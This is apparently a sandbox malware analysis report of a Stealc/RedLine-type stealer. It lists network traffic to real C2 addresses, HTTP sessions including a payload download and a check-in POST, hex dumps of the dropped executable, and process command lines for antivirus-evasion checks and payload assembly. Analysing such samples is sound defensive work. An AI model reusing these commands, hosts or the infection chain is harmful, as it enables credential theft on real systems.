Oct 8, 2024 03:52:44.718471050 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.718491077 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.718534946 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.718550920 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.718595982 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.718616009 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.718666077 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.718679905 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.718708038 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.718738079 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.718791008 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.718803883 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.718832970 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.718864918 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.718903065 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.718928099 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.718974113 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.718991995 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.719036102 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.719086885 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.719099998 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.719141960 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.719185114 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.719207048 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.719249964 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.719269037 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.719312906 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.719362974 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.719376087 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.719458103 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.719507933 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.719521999 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.719546080 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.719582081 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.719624996 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.719667912 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.719686031 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.719732046 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.719778061 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.719794035 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.719835997 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.719855070 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.719898939 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.719942093 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.719960928 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.720051050 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.755831003 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.755903006 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.756025076 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.756079912 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:46.296581030 CEST	60062	80	192.168.2.4	62.204.41.150
Oct 8, 2024 03:52:46.301698923 CEST	80	60062	62.204.41.150	192.168.2.4
Oct 8, 2024 03:52:46.301845074 CEST	60062	80	192.168.2.4	62.204.41.150
Oct 8, 2024 03:52:46.302017927 CEST	60062	80	192.168.2.4	62.204.41.150
Oct 8, 2024 03:52:46.306969881 CEST	80	60062	62.204.41.150	192.168.2.4
Oct 8, 2024 03:52:47.016905069 CEST	80	60062	62.204.41.150	192.168.2.4
Oct 8, 2024 03:52:47.016989946 CEST	60062	80	192.168.2.4	62.204.41.150
Oct 8, 2024 03:52:47.018800974 CEST	60062	80	192.168.2.4	62.204.41.150
Oct 8, 2024 03:52:47.023818016 CEST	80	60062	62.204.41.150	192.168.2.4
Oct 8, 2024 03:52:47.570333004 CEST	80	60062	62.204.41.150	192.168.2.4
Oct 8, 2024 03:52:47.570396900 CEST	60062	80	192.168.2.4	62.204.41.150
Oct 8, 2024 03:52:49.498400927 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:49.498466969 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:52.575242043 CEST	80	60062	62.204.41.150	192.168.2.4
Oct 8, 2024 03:52:52.575407028 CEST	60062	80	192.168.2.4	62.204.41.150
Oct 8, 2024 03:53:00.670861006 CEST	60062	80	192.168.2.4	62.204.41.150
Oct 8, 2024 03:54:15.654057026 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:54:15.967575073 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:54:16.575086117 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:54:17.778227091 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:54:20.184561968 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:54:24.996979952 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:54:34.606302023 CEST	60061	80	192.168.2.4	176.113.115.37

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 8, 2024 03:52:07.534759998 CEST	51507	53	192.168.2.4	1.1.1.1
Oct 8, 2024 03:52:07.549794912 CEST	53	51507	1.1.1.1	192.168.2.4
Oct 8, 2024 03:52:25.035979033 CEST	53	50520	1.1.1.1	192.168.2.4
Oct 8, 2024 03:52:42.303167105 CEST	56070	53	192.168.2.4	1.1.1.1
Oct 8, 2024 03:52:42.336889029 CEST	53	56070	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 8, 2024 03:52:07.534759998 CEST	192.168.2.4	1.1.1.1	0x5e7b	Standard query (0)	OrCgYwgbqLzMaeWAfOkOCMa.OrCgYwgbqLzMaeWAfOkOCMa	A (IP address)	IN (0x0001)	false
Oct 8, 2024 03:52:42.303167105 CEST	192.168.2.4	1.1.1.1	0x3b9	Standard query (0)	post-to-me.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 8, 2024 03:52:07.549794912 CEST	1.1.1.1	192.168.2.4	0x5e7b	Name error (3)	OrCgYwgbqLzMaeWAfOkOCMa.OrCgYwgbqLzMaeWAfOkOCMa	none	none	A (IP address)	IN (0x0001)	false
Oct 8, 2024 03:52:42.336889029 CEST	1.1.1.1	192.168.2.4	0x3b9	No error (0)	post-to-me.com		172.67.179.207	A (IP address)	IN (0x0001)	false
Oct 8, 2024 03:52:42.336889029 CEST	1.1.1.1	192.168.2.4	0x3b9	No error (0)	post-to-me.com		104.21.56.70	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

post-to-me.com

176.113.115.37

62.204.41.150

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	60061	176.113.115.37	80	7964	C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 03:52:43.397056103 CEST	85	OUT	GET /ScreenUpdateSync.exe HTTP/1.1 User-Agent: ShareScreen Host: 176.113.115.37
Oct 8, 2024 03:52:44.114233971 CEST	1236	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 01:52:44 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Tue, 08 Oct 2024 01:45:01 GMT ETag: "6ee00-623ed4925df50" Accept-Ranges: bytes Content-Length: 454144 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 fb 69 6f f7 bf 08 01 a4 bf 08 01 a4 bf 08 01 a4 d0 7e 9f a4 a7 08 01 a4 d0 7e aa a4 98 08 01 a4 d0 7e ab a4 d3 08 01 a4 b6 70 92 a4 b4 08 01 a4 bf 08 00 a4 33 08 01 a4 d0 7e ae a4 be 08 01 a4 d0 7e 9b a4 be 08 01 a4 d0 7e 9c a4 be 08 01 a4 52 69 63 68 bf 08 01 a4 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 50 23 a0 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 d6 00 00 00 f4 06 00 00 00 00 00 f9 3b 00 00 00 10 00 00 00 f0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 26 00 00 04 00 00 a5 ff 06 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$io~~~p3~~~RichPELP#e;@&@x@.text `.rdata@@.data`@.jozizud@@.raxup@@.maweb@.rsrc @@
Oct 8, 2024 03:52:44.114278078 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c7 01 c0 f2 40 00 e9 d5 1d 00 00 cc cc cc cc cc 55 8b ec 56 8b f1 c7 06 c0 f2 40 00 e8 bf 1d 00 00 f6 45 08 01 74 09 56 e8 75 Data Ascii: @UV@EtVu#^]UQVWjMKGtsHGwM#P_^]UQW9t;jMGtsHGVwM#tj^_]
Oct 8, 2024 03:52:44.114286900 CEST	1236	IN	Data Raw: cc cc cc cc 55 8b ec 6a ff 68 f8 e3 40 00 64 a1 00 00 00 00 50 64 89 25 00 00 00 00 81 ec 38 08 00 00 53 56 33 f6 89 75 f0 8b 1d 14 f0 40 00 57 8b 3d e8 f0 40 00 81 fe 8f 2c a6 0f 7d 0c ff d7 6a 00 6a 00 6a 00 6a 00 ff d3 81 fe 42 71 20 00 7f 09 Data Ascii: Ujh@dPd%8SV3u@W=@,}jjjjBq F}\|,E=jjjj@3VPVVV@VV@VVVV@3)VVV@VVVVVVV@@@VVVVV@EP@hPDEuE@
Oct 8, 2024 03:52:44.114403963 CEST	1236	IN	Data Raw: dc 72 c7 84 24 e4 00 00 00 22 4c ae 7c c7 44 24 74 62 14 ae 36 c7 44 24 58 15 a9 fe 3e c7 44 24 5c aa 29 0b 19 c7 84 24 d0 00 00 00 43 b8 00 56 c7 84 24 cc 00 00 00 bb 33 76 03 c7 44 24 48 f4 56 a6 21 c7 44 24 44 c4 2f 23 21 c7 44 24 78 1b 6f 58 Data Ascii: r$"L\|D$tb6D$X>D$\)$CV$3vD$HV!D$D/#!D$xoXD$@hmZ$Z*$ryxD$psB$j.$I$Kh?$k$;$z]L$%D$\|kUD$l>$($=$
Oct 8, 2024 03:52:44.114413023 CEST	896	IN	Data Raw: 39 b8 ad 41 27 7f f7 a4 24 b8 00 00 00 8b 84 24 b8 00 00 00 b8 7e fa 27 71 f7 a4 24 d0 00 00 00 8b 84 24 d0 00 00 00 81 ac 24 94 00 00 00 0f 97 56 31 81 ac 24 e8 00 00 00 0b 4c 1e 7b 81 44 24 40 ac 77 b7 3c 81 ac 24 bc 00 00 00 c2 17 70 15 81 6c Data Ascii: 9A'$$~'q$$$V1$L{D$@w<$pl$H~fql$XM"3 d$XD$XD$T_Dn$r2$$X'`d$@D$@$Kl$TYy$XD$`VCp$$$+;&xh$$
Oct 8, 2024 03:52:44.114422083 CEST	1236	IN	Data Raw: 10 72 2a 8b 06 eb 28 85 ff 75 f2 89 7e 10 83 f8 10 72 0e 8b 06 5f c6 00 00 8b c6 5e 5b 5d c2 08 00 5f 8b c6 5e c6 00 00 5b 5d c2 08 00 8b c6 57 53 50 e8 45 07 00 00 83 c4 0c 83 7e 14 10 89 7e 10 72 0f 8b 06 c6 04 38 00 5f 8b c6 5e 5b 5d c2 08 00 Data Ascii: r(u~r_^[]_^[]WSPE~~r8_^[]8_^[]US]VMWy;shD4E+;s;ujWSj_^[]vhDF;s(FPWMth9Ar9Fr
Oct 8, 2024 03:52:44.114429951 CEST	1236	IN	Data Raw: 1a 00 00 59 50 8b 4d 08 e8 cb f9 ff ff 8b 45 08 c9 c2 08 00 8b 49 04 e8 7c e9 ff ff 85 c0 74 08 8b 10 6a 01 8b c8 ff 12 c3 6a 04 b8 a8 e3 40 00 e8 9d 19 00 00 6a 00 8d 4d f0 e8 b6 01 00 00 83 65 fc 00 eb 17 8b f0 8b 00 8b ce a3 98 0f 45 00 e8 bf Data Ascii: YPMEI\|tjj@jMeEVYEuMMUVu@@^]UEEEPM$hPDEPEL@UVuL@^]U
Oct 8, 2024 03:52:44.114438057 CEST	1236	IN	Data Raw: e9 02 83 ef 01 83 f9 08 72 b2 fd f3 a5 fc ff 24 95 5c 2c 40 00 8d 49 00 8a 46 03 23 d1 88 47 03 8a 46 02 c1 e9 02 88 47 02 83 ee 02 83 ef 02 83 f9 08 72 88 fd f3 a5 fc ff 24 95 5c 2c 40 00 90 8a 46 03 23 d1 88 47 03 8a 46 02 88 47 02 8a 46 01 c1 Data Ascii: r$\,@IF#GFGr$\,@F#GFGFGV$\,@I,@,@ ,@(,@0,@8,@@,@S,@DDDDDDDDDDDDDD$\,@l,@t,@,@,@E
Oct 8, 2024 03:52:44.114552021 CEST	1236	IN	Data Raw: 31 40 00 90 60 30 40 00 84 30 40 00 ac 30 40 00 8a 46 03 23 d1 88 47 03 83 ee 01 c1 e9 02 83 ef 01 83 f9 08 72 b2 fd f3 a5 fc ff 24 95 4c 31 40 00 8d 49 00 8a 46 03 23 d1 88 47 03 8a 46 02 c1 e9 02 88 47 02 83 ee 02 83 ef 02 83 f9 08 72 88 fd f3 Data Ascii: 1@`0@0@0@F#Gr$L1@IF#GFGr$L1@F#GFGFGV$L1@I1@1@1@1@ 1@(1@01@C1@DDDDDDDDDDDDDD
Oct 8, 2024 03:52:44.114561081 CEST	1236	IN	Data Raw: 08 03 c8 eb 09 80 38 0a 75 03 ff 45 08 40 3b c1 72 f3 f7 47 0c 00 20 00 00 eb 40 6a 00 ff 75 fc ff 75 f8 e8 51 20 00 00 83 c4 0c 85 c0 79 05 83 c8 ff eb 38 b8 00 02 00 00 39 45 08 77 10 8b 4f 0c f6 c1 08 74 08 f7 c1 00 04 00 00 74 03 8b 47 18 89 Data Ascii: 8uE@;rG @juuQ y89EwOttGED0tEE)EEE^_[jhD"39Eu(u!Yeu*YEEE"u!YU}uuY]Vuu
Oct 8, 2024 03:52:44.119333029 CEST	1236	IN	Data Raw: 74 0f ff 75 08 e8 c1 08 00 00 59 85 c0 74 e6 c9 c3 f6 05 b8 10 45 00 01 bf ac 10 45 00 be c0 f2 40 00 75 2c 83 0d b8 10 45 00 01 6a 01 8d 45 fc 50 8b cf c7 45 fc b0 f3 40 00 e8 c5 f2 ff ff 68 c9 e4 40 00 89 35 ac 10 45 00 e8 65 08 00 00 59 57 8d Data Ascii: tuYtEE@u,EjEPE@h@5EeYWMh`DEPuU=Euk+u)hYY]jXhDEP\@395EuVVjVX@MZf9@tu6<@@PEuf9@u

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	60062	62.204.41.150	80	8096	C:\Users\user\AppData\Local\Temp\478F.tmp.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 03:52:46.302017927 CEST	88	OUT	GET / HTTP/1.1 Host: 62.204.41.150 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 03:52:47.016905069 CEST	203	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 01:52:46 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 8, 2024 03:52:47.018800974 CEST	419	OUT	POST /edd20096ecef326d.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDBGHIIDAECBFIDHIIDG Host: 62.204.41.150 Content-Length: 219 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 44 42 47 48 49 49 44 41 45 43 42 46 49 44 48 49 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 33 31 38 31 38 36 35 45 36 30 36 31 34 33 37 37 38 38 36 35 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 48 49 49 44 41 45 43 42 46 49 44 48 49 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 36 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 48 49 49 44 41 45 43 42 46 49 44 48 49 49 44 47 2d 2d 0d 0a Data Ascii: ------JDBGHIIDAECBFIDHIIDGContent-Disposition: form-data; name="hwid"E3181865E6061437788654------JDBGHIIDAECBFIDHIIDGContent-Disposition: form-data; name="build"default6_cap------JDBGHIIDAECBFIDHIIDG--
Oct 8, 2024 03:52:47.570333004 CEST	210	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 01:52:47 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	60060	172.67.179.207	443	7964	C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Timestamp	Bytes transferred	Direction	Data
2024-10-08 01:52:42 UTC	90	OUT	GET /track_prt.php?sub=0&cc=DE HTTP/1.1 User-Agent: ShareScreen Host: post-to-me.com
2024-10-08 01:52:43 UTC	596	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 01:52:43 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.4.16 cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2DszHM9SFeUUkqnifh7fHCA2kg295IZGje%2FLNkWhbR4pXio8x8DCYQthu7wzw6glmgnp7nB18paAxQttWCt5mBLoMR2Ndd2oOht5TzANaRtrJjxusamRIs01NO0MiD9ZMQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Speculation-Rules: "/cdn-cgi/speculation" Server: cloudflare CF-RAY: 8cf27e3cbc8f4304-EWR
2024-10-08 01:52:43 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-10-08 01:52:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	21:52:02
Start date:	07/10/2024
Path:	C:\Users\user\Desktop\M13W1o3scc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\M13W1o3scc.exe"
Imagebase:	0x400000
File size:	1'210'490 bytes
MD5 hash:	E6DD6A25125EDD4C21FE5CF7BAFCD2BB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	21:52:03
Start date:	07/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c move Halo Halo.bat & Halo.bat
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	21:52:03
Start date:	07/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	21:52:04
Start date:	07/10/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xbf0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	21:52:04
Start date:	07/10/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "wrsa opssvc"
Imagebase:	0x890000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	21:52:05
Start date:	07/10/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xbf0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	21:52:05
Start date:	07/10/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Imagebase:	0x890000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	21:52:05
Start date:	07/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 773416
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	21:52:05
Start date:	07/10/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "MineralAlertSignificantVanilla" Partition
Imagebase:	0x890000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	21:52:05
Start date:	07/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b ..\Transmit + ..\Turtle + ..\Vienna + ..\Diet + ..\Enclosure + ..\Bangladesh + ..\Mobility + ..\Cool + ..\Completely A
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	21:52:05
Start date:	07/10/2024
Path:	C:\Users\user\AppData\Local\Temp\773416\Welding.pif
Wow64 process (32bit):	true
Commandline:	Welding.pif A
Imagebase:	0xb0000
File size:	893'608 bytes
MD5 hash:	18CE19B57F43CE0A5AF149C96AECC685
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 5%, ReversingLabs Detection: 11%, Virustotal, Browse
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	21:52:05
Start date:	07/10/2024
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /d y /t 5
Imagebase:	0x450000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	21:52:35
Start date:	07/10/2024
Path:	C:\Users\user\AppData\Local\Temp\773416\Welding.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\773416\Welding.pif
Imagebase:	0xb0000
File size:	893'608 bytes
MD5 hash:	18CE19B57F43CE0A5AF149C96AECC685
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	21:52:44
Start date:	07/10/2024
Path:	C:\Users\user\AppData\Local\Temp\478F.tmp.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\478F.tmp.exe"
Imagebase:	0x400000
File size:	454'144 bytes
MD5 hash:	E35C6AD41081DDCDA2BA9C65B5B1A6F8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000010.00000002.2258896880.000000000080D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000010.00000002.2258864711.00000000007E1000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000010.00000002.2259075839.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000010.00000002.2259075839.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000010.00000003.2122750294.00000000022F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000010.00000002.2258545852.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 29%, ReversingLabs Detection: 38%, Virustotal, Browse
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	21:52:47
Start date:	07/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 8096 -s 1048
Imagebase:	0x990000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	17.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20.7%
Total number of Nodes:	1528
Total number of Limit Nodes:	33

Executed Functions

Function 004050CD Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 295
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 0040512F
GetDlgItem.USER32(?,000003EE), ref: 0040513E
GetClientRect.USER32(?,?), ref: 00405196
GetSystemMetrics.USER32(00000015), ref: 0040519E
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
